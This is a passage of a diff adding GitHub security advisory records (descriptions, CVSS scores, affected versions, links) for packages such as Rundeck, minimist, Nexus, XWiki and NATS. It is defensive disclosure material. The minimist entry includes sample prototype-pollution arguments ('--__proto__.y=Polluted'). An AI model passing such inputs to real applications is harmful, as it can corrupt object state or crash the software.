'2020-04-06T13:15:00Z'}"
+1.4.0,GHSA-5679-7qrc-5m7j,2021-09-02T18:48:11Z,2020-04-29T16:31:12Z,,['CVE-2020-11009'],IDOR can reveal execution data and logs to unauthorized user in Rundeck,"### Impact
+
+Authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see.
+
+> Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this is not really much of an issue. If access is wider and allows login for users that do not have access to any projects, or project access is restricted, there is a larger issue. If access is meant to be restricted and secrets, sensitive data, or intellectual property are exposed in Rundeck execution output and job data, the risk becomes much higher.
+
+### Details
+
+An authenticated user could craft a request to:
+
+* View Executions and download execution logs without access to `read` or `view` the associated Job, or ad-hoc resource.
+* Get the list of running executions in a project, without Event `read` access, if they have `read` access to view the project.
+* View the Options definitions of a Job without access to view the Job.
+* View the definition of a workflow step of a Job without access to view the Job.
+* View the SCM diff of a modified Job definition if SCM is enabled, without Project `export` access level.
+* View the New User Profile Form for a different username, without User `admin` access. Note: they would not be allowed to create or modify a profile for a different user, or reveal any user profile information for a different user.
+
+Some authenticated API requests were not correctly checking appropriate authorization levels:
+
+* The list of running Executions would be sent without `read` access to Events.
+* The Plugin Input Parameters for a SCM plugin would be sent without authorization for project `import`,`scm_import`,`export`, or `scm_export` actions.
+* Job Retry action could retry an execution without `read` or `view` access to the Execution, which would reveal the Execution's option values. (`run` access to the Job was still required).
+
+### Patches
+Upgrade to Rundeck version 3.2.6
+
+### Workarounds
+None
+
+### References
+[3.2.6 Release Notes](https://docs.rundeck.com/docs/history/3_2_x/version-3.2.6.html)
+
+### Report
+If you have any questions or comments about this advisory:
+* Email us at [security@rundeck.com](mailto:security@rundeck.com)
+
+To report security issues to Rundeck please use the form at [http://rundeck.com/security](http://rundeck.com/security)
+
+Reporter: Justine Osborne of Apple Information Security","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.rundeck:rundeck'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rundeck/rundeck/security/advisories/GHSA-5679-7qrc-5m7j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11009'}, {'type': 'WEB', 'url': 'https://docs.rundeck.com/docs/history/3_2_x/version-3.2.6.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/rundeck/rundeck'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-29T16:30:45Z', 'nvd_published_at': '2020-04-29T17:15:00Z'}"
+1.4.0,GHSA-9w6v-m7wp-jwg4,2021-08-25T21:03:11Z,2020-04-29T17:58:53Z,,['CVE-2020-11021'],Http request which redirect to another hostname do not strip authorization header in @actions/http-client,"### Impact
+If consumers of the http-client:
+ 1. make an http request with an authorization header
+ 2. that request leads to a redirect (302) and
+ 3. the redirect url redirects to another domain or hostname
+
+The authorization header will get passed to the other domain.
+
+Note that since this library is for actions, the GITHUB_TOKEN that is available in actions is generated and scoped per job with [these permissions](https://help.github.com/en/actions/configuring-and-managing-workflows/authenticating-with-the-github_token#permissions-for-the-github_token).
+
+### Patches
+The problem is fixed in 1.0.8 at [npm here](https://www.npmjs.com/package/@actions/http-client). In 1.0.8, the authorization header is stripped before making the redirected request if the hostname is different.
+
+### Workarounds
+None.
+
+### References
+https://github.com/actions/http-client/pull/27
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in https://github.com/actions/http-client/issues","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@actions/http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/actions/http-client/security/advisories/GHSA-9w6v-m7wp-jwg4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11021'}, {'type': 'WEB', 'url': 'https://github.com/actions/http-client/pull/27'}, {'type': 'WEB', 'url': 'https://github.com/actions/http-client/commit/f6aae3dda4f4c9dc0b49737b36007330f78fd53a'}, {'type': 'PACKAGE', 'url': 'https://github.com/actions/http-client/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-29T17:58:41Z', 'nvd_published_at': '2020-04-29T18:15:00Z'}"
+1.4.0,GHSA-vh95-rmgr-6w4m,2022-04-26T21:01:40Z,2020-04-03T21:48:32Z,,['CVE-2020-7598'],Prototype Pollution in minimist,"Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects.
+Parsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application.
+This is exploitable if attackers have control over the arguments being passed to `minimist`.
+
+
+
+## Recommendation
+
+Upgrade to versions 0.2.1, 1.2.3 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'minimist'}, 'ecosystem_specific': {'affected_functions': ['minimist']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'minimist'}, 'ecosystem_specific': {'affected_functions': ['minimist']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7598'}, {'type': 'WEB', 'url': 'https://github.com/minimistjs/minimist/commit/10bd4cdf49d9686d48214be9d579a9cdfda37c68'}, {'type': 'WEB', 'url': 'https://github.com/minimistjs/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab'}, {'type': 'WEB', 'url': 'https://github.com/minimistjs/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95'}, {'type': 'WEB', 'url': 'https://github.com/minimistjs/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94'}, {'type': 'PACKAGE', 'url': 'https://github.com/substack/minimist'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MINIMIST-559764'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1179'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-03T21:42:08Z', 'nvd_published_at': '2020-03-11T23:15:00Z'}"
+1.4.0,GHSA-8h56-v53h-5hhj,2021-07-28T21:49:46Z,2020-04-14T15:27:14Z,,['CVE-2020-10204'],Remote Code Execution - JavaEL Injection (low privileged accounts) in Nexus Repository Manager,Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.sonatype.nexus:nexus-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.21.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10204'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-012-nxrm-sonatype'}, {'type': 'WEB', 'url': 'https://support.sonatype.com/hc/en-us/articles/360044356194'}, {'type': 'WEB', 'url': 'https://support.sonatype.com/hc/en-us/articles/360044882533'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-14T15:26:21Z', 'nvd_published_at': '2020-04-01T19:15:00Z'}"
+1.4.0,GHSA-6m9g-jr8c-cqw3,2023-08-07T15:19:35Z,2020-04-29T17:12:39Z,,['CVE-2019-1000007'],Depth counting error in guard() leading to multiple potential security issues in aioxmpp,"### Impact
+Possible remote Denial of Service or Data Injection.
+
+### Patches
+Patches are available in https://github.com/horazont/aioxmpp/pull/268. They have been backported to the 0.10 release series and 0.10.3 is the first release to contain the fix.
+
+### Workarounds
+To make the bug exploitable, an error suppressing ``xso_error_handler`` is required. By not using ``xso_error_handlers`` or not using the suppression function, the vulnerability can be mitigated completely (to our knowledge).
+
+### References
+The pull request contains a detailed description: https://github.com/horazont/aioxmpp/pull/268
+
+### For more information
+If you have any questions or comments about this advisory:
+* [Join our chat](xmpp:aioxmpp@conference.zombofant.net?join)
+* Email the maintainer [Jonas Schäfer](mailto:jonas@wielicki.name)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'aioxmpp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/horazont/aioxmpp/security/advisories/GHSA-6m9g-jr8c-cqw3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1000007'}, {'type': 'WEB', 'url': 'https://github.com/horazont/aioxmpp/pull/268'}, {'type': 'WEB', 'url': 'https://github.com/horazont/aioxmpp/commit/29ff0838a40f58efe30a4bbcea95aa8dab7da475'}, {'type': 'WEB', 'url': 'https://github.com/horazont/aioxmpp/commit/f151f920f439d97d4103fc11057ed6dc34fe98be'}, {'type': 'PACKAGE', 'url': 'https://github.com/horazont/aioxmpp'}]","{'cwe_ids': ['CWE-237'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-29T17:12:16Z', 'nvd_published_at': '2019-02-04T21:29:00Z'}"
+1.4.0,GHSA-g2f6-v5qh-h2mq,2021-07-28T21:48:57Z,2020-04-14T15:27:05Z,,['CVE-2020-10199'],Nexus Repository Manager 3 - Remote Code Execution ,Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.sonatype.nexus:nexus-extdirect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.21.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10199'}, {'type': 'WEB', 'url': 'https://cwe.mitre.org/data/definitions/917.html'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-015-nxrm-sonatype'}, {'type': 'WEB', 'url': 'https://support.sonatype.com/hc/en-us/articles/360044882533'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/160835/Sonatype-Nexus-3.21.1-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-917'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-14T15:26:13Z', 'nvd_published_at': '2020-04-01T19:15:00Z'}"
+1.4.0,GHSA-24m3-w8g9-jwpq,2021-10-20T22:23:05Z,2020-04-22T20:59:44Z,,['CVE-2020-5301'],Information disclosure of source code in SimpleSAMLphp,"### Background
+
+The module controller in `SimpleSAML\Module` that processes requests for pages
+hosted by modules, has code to identify paths ending with `.php` and process
+those as PHP code. If no other suitable way of handling the given path exists it
+presents the file to the browser.
+
+### Description
+
+The check to identify paths ending with `.php` does not account for uppercase
+letters. If someone requests a path ending with e.g. `.PHP` and the server is
+serving the code from a case-insensitive file system, such as on Windows, the
+processing of the PHP code does not occur, and the source code is instead
+presented to the browser.
+
+### Affected versions
+
+SimpleSAMLphp versions **1.18.5 and older**.
+
+### Impact
+
+An attacker may use this issue to gain access to the source code in third-party
+modules that is meant to be private, or even sensitive. However, the attack
+surface is considered small, as the attack will only work when SimpleSAMLphp
+serves such content from a file system that is not case-sensitive, such as on
+Windows.
+
+### Resolution
+
+Upgrade the SimpleSAMLphp installation to version **1.18.6**.
+
+### Credit
+
+This vulnerability was discovered and reported by Sławek Naczyński.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'simplesamlphp/simplesamlphp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simplesamlphp/simplesamlphp/security/advisories/GHSA-24m3-w8g9-jwpq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5301'}, {'type': 'WEB', 'url': 'https://github.com/simplesamlphp/simplesamlphp/commit/47968d26a2fd3ed52da70dc09210921d612ce44e'}, {'type': 'PACKAGE', 'url': 'https://github.com/simplesamlphp/simplesamlphp/'}]","{'cwe_ids': ['CWE-178', 'CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-04-21T19:50:30Z', 'nvd_published_at': '2020-04-21T20:15:00Z'}"
+1.4.0,GHSA-9j2c-x8qm-qmjq,2021-01-08T20:21:40Z,2020-04-20T21:31:23Z,,['CVE-2020-11010'],SQL injection in Tortoise ORM,"### Impact
+Various forms of SQL injection has been found, for MySQL and when filtering or doing mass-updates on char/text fields.
+SQLite & PostgreSQL was only affected when filtering with ``contains``, ``starts_with`` or ``ends_with`` filters (and their case-insensitive counterparts)
+
+
+### Patches
+Please upgrade to 0.15.23+ or 0.16.6+
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Github](https://github.com/tortoise/tortoise-orm/issues)
+* Chat to us on [Gitter](https://gitter.im/tortoise/community)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tortoise-orm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.23'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tortoise-orm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.16.0'}, {'fixed': '0.16.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tortoise/tortoise-orm/security/advisories/GHSA-9j2c-x8qm-qmjq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11010'}, {'type': 'WEB', 'url': 'https://github.com/tortoise/tortoise-orm/commit/91c364053e0ddf77edc5442914c6f049512678b3'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-20T21:31:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6pmv-7pr9-cgrj,2021-08-23T15:17:35Z,2020-04-15T21:09:27Z,,['CVE-2020-1731'],Predictable password in Keycloak,"A flaw was found in all versions of the Keycloak operator, before version 8.0.2,(community only) where the operator generates a random admin password when installing Keycloak, however the password remains the same when deployed to the same OpenShift namespace.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1731'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1731'}]","{'cwe_ids': ['CWE-330', 'CWE-341'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-15T20:59:00Z', 'nvd_published_at': '2020-03-02T17:15:00Z'}"
+1.4.0,GHSA-3944-787c-f852,2021-08-23T15:11:55Z,2020-04-14T15:27:21Z,,['CVE-2020-10203'],Persistent Cross-Site scripting in Nexus Repository Manager,Sonatype Nexus Repository before 3.21.2 allows XSS.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.sonatype.nexus:nexus-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.21.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10203'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-016-nxrm-sonatype'}, {'type': 'WEB', 'url': 'https://support.sonatype.com/hc/en-us/articles/360044361594'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-14T15:26:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6495-8jvh-f28x,2021-10-04T21:23:14Z,2020-10-02T15:39:54Z,,[],File restriction bypass in socket.io-file,"All versions of `socket.io-file`are vulnerable to a file restriction bypass. The validation for valid file types only happens on the client-side, which allows an attacker to intercept the Websocket request post-validation and alter the `name` value to upload any file types.
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'socket.io-file'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24807'}, {'type': 'PACKAGE', 'url': 'https://github.com/rico345100/socket.io-file'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1564'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-02T15:36:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5hv6-mh8q-q9v8,2021-11-19T14:41:16Z,2020-10-16T16:55:49Z,,['CVE-2020-15252'],RCE in XWiki,"### Impact
+
+Any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution.
+
+### Patches
+
+It has been patched in both version XWiki 12.5 and XWiki 11.10.6.
+
+### Workarounds
+
+The only workaround is to give SCRIPT right only to trusted users.
+
+### References
+
+https://jira.xwiki.org/browse/XWIKI-17423
+
+It's been reported by the GitHub Security Lab under https://jira.xwiki.org/browse/XWIKI-17141.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Jira XWiki](https://jira.xwiki.org)
+* Email us at [our security mailing list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0'}, {'fixed': '12.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5hv6-mh8q-q9v8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15252'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-17141'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-17423'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-16T16:55:27Z', 'nvd_published_at': '2020-10-16T17:15:00Z'}"
+1.4.0,GHSA-8gv3-3j7f-wg94,2021-11-19T15:12:40Z,2020-10-02T16:22:19Z,,['CVE-2020-15227'],Potential Remote Code Execution vulnerability,"Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE.
+
+Reported by Cyku Hong from DEVCORE (https://devco.re)
+
+### Impact
+Code injection, possible remote code execution.
+
+### Patches
+Fixed in nette/application 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette 2.0.19 and 2.1.13","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nette/application'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'nette/application'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.14'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'nette/application'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.16'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'nette/application'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'nette/application'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'nette/application'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15227'}, {'type': 'PACKAGE', 'url': 'https://github.com/nette/application'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00003.html'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/nette/application'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/nette/nette'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-10-01T19:00:48Z', 'nvd_published_at': '2020-10-01T19:15:00Z'}"
+1.4.0,GHSA-5jjv-x4fq-qjwp,2023-05-16T16:18:49Z,2020-10-05T15:48:34Z,,['CVE-2020-15237'],Possible timing attack in derivation_endpoint,"### Impact
+
+When using the `derivation_endpoint` plugin, it's possible for the attacker to use a timing attack to guess the signature of the derivation URL.
+
+### Patches
+
+The problem has been fixed by comparing sent and calculated signature in constant time, using `Rack::Utils.secure_compare`. Users using the `derivation_endpoint` plugin are urged to upgrade to Shrine 3.3.0 or greater.
+
+### Workarounds
+
+Users of older Shrine versions can apply the following monkey-patch after loading the `derivation_endpoint` plugin:
+
+```rb
+class Shrine
+ class UrlSigner
+ def verify_signature(string, signature)
+ if signature.nil?
+ fail InvalidSignature, ""missing \""signature\"" param""
+ elsif !Rack::Utils.secure_compare(signature, generate_signature(string))
+ fail InvalidSignature, ""provided signature does not match the calculated signature""
+ end
+ end
+ end
+end
+```
+
+### References
+
+You can read more about timing attacks [here](https://en.wikipedia.org/wiki/Timing_attack).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'shrine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shrinerb/shrine/security/advisories/GHSA-5jjv-x4fq-qjwp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15237'}, {'type': 'WEB', 'url': 'https://github.com/shrinerb/shrine/commit/1b27090ce31543bf39f186c20ea47c8250fca2f0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/shrine/CVE-2020-15237.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/shrinerb/shrine'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-10-05T15:46:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p68v-frgx-4rjp,2020-10-19T21:34:01Z,2020-10-19T21:34:14Z,,[],Denial of Service via Cache Flooding,"### Impact
+ Denial of Service via Cache Flooding
+
+### Patches
+We recommend to update to the current version 6.3.2.1. You can get the update to 6.3.2.1 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+For older versions of 6.1 and 6.2 the corresponding changes are also available via plugin:
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### For more information
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-10-2020",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.2.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.2.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-p68v-frgx-4rjp'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-10-19T21:34:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-82rf-q3pr-4f6p,2023-09-11T20:18:19Z,2020-10-08T22:11:32Z,,['CVE-2020-26149'],Sensitive data exposure in NATS,"Preview versions of two NPM packages and one Deno package from the NATS project contain an information disclosure flaw, leaking options to the NATS server; for one package, this includes TLS private credentials.
+
+The `_connection_` configuration options in these JavaScript-based implementations were fully serialized and sent to the server in the client's CONNECT message, immediately after TLS establishment.
+
+The nats.js client supports Mutual TLS and the credentials for the TLS client key are included in the connection configuration options; disclosure of the client's TLS private key to the server has been observed.
+
+Most authentication mechanisms are handled after connection, instead of as part of connection, so other authentication mechanisms are unaffected. For clarity: NATS account NKey authentication is NOT affected.
+
+Neither the nats.ws nor the nats.deno clients support Mutual TLS: the affected versions listed below are those where the logic flaw is present. We are including the nats.ws and nats.deno versions out of an abundance of caution, as library maintainers, but rate as minimal the likelihood of applications leaking sensitive data.
+
+### Security impact:
+
+* NPM package nats.js:
++ mainline is unaffected
++ beta branch is vulnerable from 2.0.0-201, fixed in 2.0.0-209
+
+### Logic flaw:
+
+* NPM package nats.ws:
++ status: preview
++ flawed from 1.0.0-85, fixed in 1.0.0-111
+* Deno repository https://github.com/nats-io/nats.deno
++ status: preview
++ flawed in all git tags prior to fix
++ fixed with git tag v1.0.0-9
+
+### Impact:
+
+For deployments using TLS client certificates (for mutual TLS), private key material for TLS is leaked from the client application to the server. If the server is untrusted (run by a third party), or if the client application also disables TLS verification (and so the true identity of the server is unverifiable) then authentication credentials are leaked.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'nats'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-201'}, {'fixed': '2.0.0-209'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.0-206'}}, {'package': {'ecosystem': 'npm', 'name': 'nats.ws'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-85'}, {'fixed': '1.0.0-111'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-110'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26149'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats.ws/commit/0a37ac2a411ff63f0707cda69a268c5fc4079eb7'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats.deno/compare/v1.0.0-8...v1.0.0-9'}, {'type': 'PACKAGE', 'url': 'https://github.com/nats-io/nats.ws'}, {'type': 'WEB', 'url': 